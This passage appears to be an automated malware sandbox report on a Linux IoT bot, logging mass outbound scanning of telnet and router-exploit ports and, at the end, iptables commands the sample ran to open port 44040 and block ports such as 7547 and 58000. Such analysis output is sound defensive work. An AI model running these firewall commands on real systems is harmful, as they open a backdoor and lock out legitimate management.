Source: global traffic	TCP traffic: 192.168.2.20:48304 -> 93.252.183.105:5555
Source: global traffic	TCP traffic: 192.168.2.20:40482 -> 169.153.122.4:8080
Source: global traffic	TCP traffic: 192.168.2.20:37676 -> 45.175.32.225:7574
Source: global traffic	TCP traffic: 192.168.2.20:55092 -> 175.116.229.144:8443
Source: global traffic	TCP traffic: 192.168.2.20:40358 -> 1.229.142.252:8080
Source: global traffic	TCP traffic: 192.168.2.20:55158 -> 161.55.227.176:8080
Source: global traffic	TCP traffic: 192.168.2.20:40944 -> 3.54.72.115:8443
Source: global traffic	TCP traffic: 192.168.2.20:60000 -> 211.130.169.58:52869
Source: global traffic	TCP traffic: 192.168.2.20:58138 -> 71.189.125.136:8080
Source: global traffic	TCP traffic: 192.168.2.20:52926 -> 35.134.65.144:5555
Source: global traffic	TCP traffic: 192.168.2.20:53140 -> 81.185.164.190:49152
Source: global traffic	TCP traffic: 192.168.2.20:58740 -> 68.38.131.19:8443
Source: global traffic	TCP traffic: 192.168.2.20:48186 -> 158.215.177.9:7574
Source: global traffic	TCP traffic: 192.168.2.20:33492 -> 21.71.60.36:52869
Source: global traffic	TCP traffic: 192.168.2.20:41634 -> 15.139.248.72:8080
Source: global traffic	TCP traffic: 192.168.2.20:59812 -> 52.173.108.207:8080
Source: global traffic	TCP traffic: 192.168.2.20:59544 -> 14.27.221.29:8080
Source: global traffic	TCP traffic: 192.168.2.20:50294 -> 200.160.26.61:37215
Source: global traffic	TCP traffic: 192.168.2.20:58298 -> 117.0.115.227:52869
Source: global traffic	TCP traffic: 192.168.2.20:55566 -> 72.204.193.69:37215
Source: global traffic	TCP traffic: 192.168.2.20:60458 -> 88.55.10.218:8080
Source: global traffic	TCP traffic: 192.168.2.20:55866 -> 173.95.216.55:5555
Source: global traffic	TCP traffic: 192.168.2.20:39734 -> 131.6.224.238:8080
Source: global traffic	TCP traffic: 192.168.2.20:52616 -> 108.58.115.194:49152
Source: global traffic	TCP traffic: 192.168.2.20:58152 -> 217.28.121.124:8080
Source: global traffic	TCP traffic: 192.168.2.20:41218 -> 176.24.193.254:7574
Source: global traffic	TCP traffic: 192.168.2.20:47630 -> 107.15.195.209:8443
Source: global traffic	TCP traffic: 192.168.2.20:37986 -> 132.224.19.35:8080
Source: global traffic	TCP traffic: 192.168.2.20:39588 -> 85.4.13.35:52869
Source: global traffic	TCP traffic: 192.168.2.20:44530 -> 114.116.30.250:7574
Source: global traffic	TCP traffic: 192.168.2.20:44300 -> 13.23.175.71:81
Source: global traffic	TCP traffic: 192.168.2.20:40322 -> 209.49.249.153:8443
Source: global traffic	TCP traffic: 192.168.2.20:42126 -> 89.192.178.91:37215
Source: global traffic	TCP traffic: 192.168.2.20:44606 -> 61.175.55.132:8443
Source: global traffic	TCP traffic: 192.168.2.20:54536 -> 167.174.7.212:8080
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 154.18.253.69:1023
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 42.157.134.10:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 108.74.215.207:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 216.157.116.109:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 121.147.101.239:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 191.216.64.228:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 187.25.8.99:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 210.225.37.119:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 173.191.26.173:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 107.5.252.208:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 180.196.64.7:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 184.90.217.19:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 66.169.135.72:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 153.43.5.52:1023
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 20.10.172.16:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 24.173.204.79:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 40.231.251.18:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 44.125.192.91:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 185.199.252.8:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 202.222.248.221:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 65.76.58.171:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 97.152.241.251:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 92.140.135.135:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 221.79.125.189:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 97.19.93.192:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 112.208.55.3:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 74.181.98.131:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 146.221.115.228:1023
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 147.32.87.2:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 188.213.166.122:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 158.198.126.211:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 221.11.44.192:2323
Source: global traffic	TCP traffic: 192.168.2.20:45980 -> 206.215.160.208:8443
Source: global traffic	TCP traffic: 192.168.2.20:60230 -> 194.134.230.15:8080
Source: global traffic	TCP traffic: 192.168.2.20:33288 -> 168.62.179.106:8080
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 186.129.59.209:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 183.39.114.210:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 69.160.36.31:1023
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 41.208.87.109:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 19.1.83.59:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 189.83.101.94:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 89.211.68.0:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 40.110.214.92:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 187.48.184.226:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 112.253.107.53:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 12.145.180.4:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 151.11.34.204:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 70.130.42.81:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 4.110.27.220:1023
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 160.227.213.97:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 187.190.81.26:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 107.61.226.20:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 212.252.174.236:1023
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 12.233.123.43:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 153.192.241.136:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 147.166.248.166:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 223.87.220.29:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 13.152.241.242:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 121.61.31.17:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 63.253.84.254:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 86.185.251.149:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 8.92.251.48:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 211.32.153.82:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 203.0.21.109:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 72.221.8.246:1023
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 202.213.206.179:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 35.117.35.167:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 151.194.99.188:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 212.103.236.147:2323
Source: global traffic	TCP traffic: 192.168.2.20:36064 -> 47.145.217.113:5555
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 212.219.62.189:1023
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 206.123.155.195:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 76.92.182.82:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 36.33.205.198:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 38.157.124.234:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 58.155.188.76:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 113.44.78.247:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 97.68.83.8:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 121.99.87.167:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 87.22.241.41:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 178.95.227.170:1023
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 118.211.78.213:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 151.87.97.55:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 209.66.123.242:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 27.255.154.108:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 176.242.102.183:1023
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 146.35.33.184:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 65.77.77.241:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 219.122.59.104:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 101.118.160.184:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 81.54.132.55:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 175.223.210.199:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 191.15.46.25:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 168.145.68.126:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 38.29.8.84:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 84.255.39.9:1023
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 175.61.243.196:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 100.134.61.27:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 217.93.0.20:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 79.65.71.65:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 20.167.158.223:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 74.118.105.34:2323
Source: global traffic	TCP traffic: 192.168.2.20:42434 -> 187.254.232.94:8443
Source: global traffic	TCP traffic: 192.168.2.20:43764 -> 207.11.230.122:8080
Source: global traffic	TCP traffic: 192.168.2.20:48034 -> 19.134.158.13:8080
Source: global traffic	TCP traffic: 192.168.2.20:48348 -> 44.61.11.55:8080
Source: global traffic	TCP traffic: 192.168.2.20:48496 -> 178.113.43.27:7574
Source: global traffic	TCP traffic: 192.168.2.20:50444 -> 123.219.44.5:81
Source: global traffic	TCP traffic: 192.168.2.20:48516 -> 89.233.76.116:8080
Source: global traffic	TCP traffic: 192.168.2.20:39274 -> 149.212.141.67:52869
Source: global traffic	TCP traffic: 192.168.2.20:50534 -> 211.137.192.96:8080
Source: global traffic	TCP traffic: 192.168.2.20:59440 -> 88.201.76.34:7574
Source: global traffic	TCP traffic: 192.168.2.20:53588 -> 79.165.147.138:5555
Source: global traffic	TCP traffic: 192.168.2.20:35806 -> 37.229.199.107:8443
Source: global traffic	TCP traffic: 192.168.2.20:60106 -> 190.174.62.228:7574
Source: global traffic	TCP traffic: 192.168.2.20:54834 -> 40.19.224.212:8080
Source: global traffic	TCP traffic: 192.168.2.20:59008 -> 196.13.229.215:52869
Source: global traffic	TCP traffic: 192.168.2.20:36360 -> 101.193.149.11:81
Source: global traffic	TCP traffic: 192.168.2.20:50182 -> 148.157.191.210:49152
Source: global traffic	TCP traffic: 192.168.2.20:36990 -> 146.151.247.1:52869
Source: global traffic	TCP traffic: 192.168.2.20:37184 -> 173.191.56.106:8080
Source: global traffic	TCP traffic: 192.168.2.20:46266 -> 214.0.104.172:52869
Source: global traffic	TCP traffic: 192.168.2.20:60148 -> 206.34.195.249:81
Source: global traffic	TCP traffic: 192.168.2.20:41632 -> 134.240.237.208:8443
Source: global traffic	TCP traffic: 192.168.2.20:50748 -> 221.163.252.68:7574
Source: global traffic	TCP traffic: 192.168.2.20:56358 -> 13.176.53.86:52869
Source: global traffic	TCP traffic: 192.168.2.20:56030 -> 152.180.2.14:8080
Source: global traffic	TCP traffic: 192.168.2.20:34140 -> 3.184.34.149:8443
Source: global traffic	TCP traffic: 192.168.2.20:57666 -> 171.141.124.240:8443
Source: global traffic	TCP traffic: 192.168.2.20:42454 -> 89.125.164.152:52869
Source: global traffic	TCP traffic: 192.168.2.20:49348 -> 193.121.216.28:8080
Source: global traffic	TCP traffic: 192.168.2.20:49216 -> 164.154.93.195:8080
Source: global traffic	TCP traffic: 192.168.2.20:42866 -> 222.34.74.234:8080
Source: global traffic	TCP traffic: 192.168.2.20:36006 -> 18.247.152.131:5555
Source: global traffic	TCP traffic: 192.168.2.20:47312 -> 204.170.101.0:37215
Source: global traffic	TCP traffic: 192.168.2.20:34394 -> 5.230.135.152:37215
Source: global traffic	TCP traffic: 192.168.2.20:39916 -> 118.110.234.130:7574
Source: global traffic	TCP traffic: 192.168.2.20:33904 -> 122.25.166.83:52869
Source: global traffic	TCP traffic: 192.168.2.20:45598 -> 45.204.245.109:49152
Source: global traffic	TCP traffic: 192.168.2.20:56044 -> 147.133.242.76:8080
Source: global traffic	TCP traffic: 192.168.2.20:59490 -> 19.118.124.110:7574
Source: global traffic	TCP traffic: 192.168.2.20:42346 -> 132.139.233.175:37215
Source: global traffic	TCP traffic: 192.168.2.20:59948 -> 117.21.87.201:7574
Source: global traffic	TCP traffic: 192.168.2.20:58880 -> 6.243.236.18:8080
Source: global traffic	TCP traffic: 192.168.2.20:45762 -> 3.67.142.9:5555
Source: global traffic	TCP traffic: 192.168.2.20:41018 -> 70.33.99.104:5555
Source: global traffic	TCP traffic: 192.168.2.20:42532 -> 152.100.167.36:8443
Source: global traffic	TCP traffic: 192.168.2.20:32890 -> 58.12.204.60:8080
Source: global traffic	TCP traffic: 192.168.2.20:32780 -> 4.2.179.224:81
Source: global traffic	TCP traffic: 192.168.2.20:54140 -> 196.106.27.28:81
Source: global traffic	TCP traffic: 192.168.2.20:52696 -> 123.224.23.253:8080
Source: global traffic	TCP traffic: 192.168.2.20:36056 -> 22.193.177.229:52869
Source: global traffic	TCP traffic: 192.168.2.20:52546 -> 93.204.44.191:8443
Source: global traffic	TCP traffic: 192.168.2.20:51248 -> 35.83.92.160:5555
Source: global traffic	TCP traffic: 192.168.2.20:39020 -> 204.121.33.136:49152
Source: global traffic	TCP traffic: 192.168.2.20:58310 -> 175.140.231.185:8080
Source: global traffic	TCP traffic: 192.168.2.20:39544 -> 133.59.219.177:49152
Source: global traffic	TCP traffic: 192.168.2.20:52212 -> 43.25.44.12:7574
Source: global traffic	TCP traffic: 192.168.2.20:41908 -> 209.121.184.1:49152
Source: global traffic	TCP traffic: 192.168.2.20:53734 -> 219.159.206.231:49152
Source: global traffic	TCP traffic: 192.168.2.20:47382 -> 143.190.192.234:81
Source: global traffic	TCP traffic: 192.168.2.20:43158 -> 160.205.73.207:5555
Source: global traffic	TCP traffic: 192.168.2.20:32832 -> 117.175.62.17:52869
Source: global traffic	TCP traffic: 192.168.2.20:43804 -> 180.27.20.9:8443
Source: global traffic	TCP traffic: 192.168.2.20:48400 -> 79.46.53.90:5555
Source: global traffic	TCP traffic: 192.168.2.20:51920 -> 170.153.165.207:37215
Source: global traffic	TCP traffic: 192.168.2.20:52388 -> 25.120.108.166:37215
Source: global traffic	TCP traffic: 192.168.2.20:38936 -> 88.143.113.184:37215
Source: global traffic	TCP traffic: 192.168.2.20:43268 -> 15.35.59.131:8080
Source: global traffic	TCP traffic: 192.168.2.20:44336 -> 44.140.107.144:37215
Source: global traffic	TCP traffic: 192.168.2.20:40376 -> 106.57.104.27:8080
Source: global traffic	TCP traffic: 192.168.2.20:37816 -> 119.44.94.32:8080
Source: global traffic	TCP traffic: 192.168.2.20:58936 -> 222.91.171.102:5555
Source: global traffic	TCP traffic: 192.168.2.20:50526 -> 152.99.103.175:81
Source: global traffic	TCP traffic: 192.168.2.20:35450 -> 168.17.134.196:8080
Source: global traffic	TCP traffic: 192.168.2.20:51626 -> 197.177.18.211:8080
Source: global traffic	TCP traffic: 192.168.2.20:56636 -> 196.83.210.30:8443
Source: global traffic	TCP traffic: 192.168.2.20:38300 -> 185.155.197.240:81
Source: global traffic	TCP traffic: 192.168.2.20:33164 -> 121.26.58.85:49152
Source: global traffic	TCP traffic: 192.168.2.20:56170 -> 164.150.9.40:7574
Source: global traffic	TCP traffic: 192.168.2.20:39376 -> 51.12.46.124:5555
Source: global traffic	TCP traffic: 192.168.2.20:48264 -> 121.149.137.245:8080
Source: global traffic	TCP traffic: 192.168.2.20:42412 -> 2.93.191.137:8080
Source: global traffic	TCP traffic: 192.168.2.20:41438 -> 189.120.2.56:81
Source: global traffic	TCP traffic: 192.168.2.20:50726 -> 177.173.185.50:5555
Source: global traffic	TCP traffic: 192.168.2.20:48968 -> 43.219.247.168:7574
Source: global traffic	TCP traffic: 192.168.2.20:54234 -> 91.65.28.188:8080
Source: global traffic	TCP traffic: 192.168.2.20:51310 -> 177.152.69.68:81
Source: global traffic	TCP traffic: 192.168.2.20:52066 -> 65.70.118.43:8080
Source: global traffic	TCP traffic: 192.168.2.20:45870 -> 188.24.124.134:49152
Source: global traffic	TCP traffic: 192.168.2.20:60646 -> 166.82.7.224:7574
Source: global traffic	TCP traffic: 192.168.2.20:42804 -> 217.94.12.32:81
Source: global traffic	TCP traffic: 192.168.2.20:45324 -> 31.15.157.79:8080
Source: global traffic	TCP traffic: 192.168.2.20:37168 -> 167.68.166.142:8080
Source: global traffic	TCP traffic: 192.168.2.20:44994 -> 179.125.55.171:49152
Source: global traffic	TCP traffic: 192.168.2.20:53832 -> 212.136.201.1:8080
Source: global traffic	TCP traffic: 192.168.2.20:54182 -> 88.151.118.122:49152
Source: global traffic	TCP traffic: 192.168.2.20:55594 -> 20.188.249.215:5555
Source: global traffic	TCP traffic: 192.168.2.20:51284 -> 29.173.93.82:5555
Source: global traffic	TCP traffic: 192.168.2.20:53790 -> 41.225.3.47:8080
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 53.150.184.227:1023
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 66.51.200.37:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 181.150.246.6:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 86.87.169.9:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 135.159.46.50:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 81.122.5.245:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 101.175.97.186:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 201.16.210.127:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 150.231.221.134:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 165.27.212.212:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 35.145.36.100:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 184.123.210.115:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 84.139.204.146:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 210.20.165.119:1023
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 90.245.89.183:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 102.40.194.39:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 117.110.44.183:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 187.84.203.177:1023
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 145.127.164.51:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 212.60.191.99:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 46.92.49.206:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 90.60.92.48:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 164.125.182.98:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 210.11.149.99:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 68.213.132.158:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 206.141.207.185:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 37.36.151.108:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 99.148.128.207:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 188.2.194.211:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 27.247.199.146:1023
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 148.17.145.65:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 145.224.134.187:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 17.179.66.133:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 94.136.154.153:1023
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 195.153.115.31:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 82.26.125.94:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 148.166.250.32:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 73.60.149.25:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 73.38.107.147:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 46.69.94.69:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 206.45.246.151:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 89.207.33.190:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 211.121.235.206:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 81.181.240.162:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 37.141.143.27:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 37.126.181.96:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 111.71.34.120:1023
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 209.70.240.234:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 71.90.204.120:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 169.164.54.25:2323
Source: global traffic	TCP traffic: 192.168.2.20:32898 -> 54.217.177.252:8080
Source: global traffic	TCP traffic: 192.168.2.20:51920 -> 91.128.122.128:7574
Source: global traffic	TCP traffic: 192.168.2.20:54630 -> 83.158.11.78:8080
Source: global traffic	TCP traffic: 192.168.2.20:50738 -> 219.170.242.188:37215
Source: global traffic	TCP traffic: 192.168.2.20:39524 -> 79.209.77.202:49152
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 187.201.188.204:1023
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 166.40.116.98:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 118.148.44.14:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 5.203.164.245:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 162.139.86.71:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 209.174.66.76:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 166.38.89.126:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 120.0.30.153:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 178.137.1.177:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 69.68.118.29:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 92.154.174.188:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 184.171.204.218:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 59.250.162.213:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 182.82.125.53:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 121.36.221.166:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 80.18.245.185:1023
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 200.141.44.86:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 97.229.39.239:1023
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 102.53.0.243:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 27.3.146.85:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 36.170.191.82:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 187.78.202.173:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 201.198.23.60:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 179.131.194.114:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 86.67.177.59:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 13.100.254.46:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 158.118.208.135:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 130.221.150.32:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 177.168.241.5:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 12.59.131.86:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 67.52.33.137:1023
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 209.64.40.28:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 104.126.166.232:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 57.181.135.64:2323
Source: global traffic	TCP traffic: 192.168.2.20:45494 -> 82.194.132.178:49152
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 153.71.86.60:1023
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 89.62.41.91:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 166.24.116.26:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 91.80.195.73:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 158.233.4.149:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 66.162.164.85:2323

Executes the "iptables" command used for managing IP filtering and manipulation

Source: /bin/sh (PID: 4638)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4672)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4679)	Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4720)	Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4732)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4755)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4763)	Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4785)	Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4815)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4819)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4838)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4866)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4896)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4915)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4939)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4966)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4986)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4992)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5015)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP	Jump to behavior
